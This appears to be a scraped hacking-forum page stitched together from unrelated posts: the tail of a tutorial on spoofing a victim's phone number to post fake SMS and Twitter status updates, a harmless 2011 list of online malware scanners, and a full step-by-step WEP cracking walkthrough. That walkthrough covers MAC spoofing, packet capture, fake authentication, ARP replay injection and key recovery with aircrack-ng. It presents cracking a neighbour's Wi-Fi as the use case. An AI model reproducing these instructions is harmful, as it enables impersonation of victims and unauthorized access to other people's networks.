just Send a sms to 9232232665 and type in slave's moble no. in the "Sender ID From" textbox and type in the status in the "Message" Textbox.
This is One Loophole that i found by myself.
For Twitter ( works globally ), not limited to india
you can also update slave's status on twitter by spoofing His/Her Number.
Check out This LINK
to know more on how to update slave's Tweet.
One More Thing, Buying Credits is Real Cheap at this website. So don't hesitate to spend some money on buying credits.
I hope you Liked My TUT.
Feedback Appreciated.

List of Free Online Scanners 2011

What do the titles mean?
Browser - Scans are done inside your browser. A plugin is usually needed in order for a scan to take place. You will be prompted to install the plugin before the scan starts. NOTE: Internet Explorer is needed to run 95% of these links. It is recommended to use IE for them all!
Single File - These sites allow you to upload one (1) file you find suspicious. Most of these sites have a limit on the size of the file allowed to be uploaded. Be sure to check and make sure you meet their requirements.
Single File - Multi - This simply means that there are multiple scanning engines used to scan your file/URL.
File Analysis - Here you can submit a Windows executable and receive an analysis report telling you what it does.
URL Scan - These sites scan URL's and inform you whether or not they're safe to visit.
Browser:
http://www.eset.com/onlinescan/
http://www.pandasecurity.com/activescan/index/
http://www.bitdefender.com/scan8/ie.html
http://security.symantec.com/sscv6/home....XGEQGGYYFK
http://www.emsisoft.com/en/software/ax/?scan=1
http://us.mcafee.com/root/mfs/scan.asp?affid=56
http://support.f-secure.com/enu/home/ols.shtml
http://onecare.live.com/site/en-us/default.htm
http://www.tenebril.com/scanner/main_start.php
http://www.kingsoftresearch.com/kos_v3/index.htm
http://helpdeskarchive.uvic.ca/security/...check.html
Single File - Multi:
http://www.virustotal.com/
http://virusscan.jotti.org/
http://vscan.novirusthanks.org/
http://www.viruschief.com/
http://www.virscan.org/
Single File:
http://www.kaspersky.com/virusscanner
http://online.drweb.com/?url=1
http://onlinescan.avast.com/
http://www.gietl.com/test-clamav/
http://www.fortiguardcenter.com/antiviru...anner.html
http://www.threatexpert.com/filescan.aspx
http://www.filterbit.com/
URL Scan - Multi:
http://www.urlvoid.com/
http://www.ipvoid.com/
http://siteinspector.comodo.com/addsite_en/
Thanks, hope I could help. If you liked this article please leave a reply below and do suggest some online website vulnerability scanners too.

How to Crack a Wi-Fi Network’s WEP Password with BackTrack

WEP Is one of the unsecured encryption available so hackers mostly tries to break this is public environment and may be neighbor hoods Wifi signal.To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the task-bar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:
airmon-ng
The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands. See the output that I got for them in the screenshot below.
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
How to Crack a Wi-Fi Network's WEP Password with BackTrack If you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55.

Now it's time to pick your network. Run:
airodump-ng (interface)
To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.
How to Crack a Wi-Fi Network's WEP Password with BackTrack Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands.

Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking.

You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the "#Data" column—you want it to go above 10,000. (Pictured below it's only at 854.)
Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)
Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:

How to Crack a Wi-Fi Network's WEP Password with BackTrack The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.
Problems Along the Way
With this article I set out to prove that cracking WEP is a relatively "easy" process for someone determined and willing to get the hardware and software going. I still think that's true, but unlike the guy in the video below, I had several difficulties along the way. In fact, you'll notice that the last screenshot up there doesn't look like the others—it's because it's not mine. Even though the AP which I was cracking was my own and in the same room as my Alfa, the power reading on the signal was always around -30, and so the data collection was very slow, and BackTrack would consistently crash before it was complete. After about half a dozen attempts (and trying BackTrack on both my Mac and PC, as a live CD and a virtual machine), I still haven't captured enough data for aircrack to decrypt the key.
So while this process is easy in theory, your mileage may vary depending on your hardware, proximity to the AP point, and the way the planets are aligned. Oh yeah, and if you're on deadline—Murphy's Law almost guarantees it won't work if you're on deadline.
Refer This Video if you don't understand the above tute :- WEP Cracking Video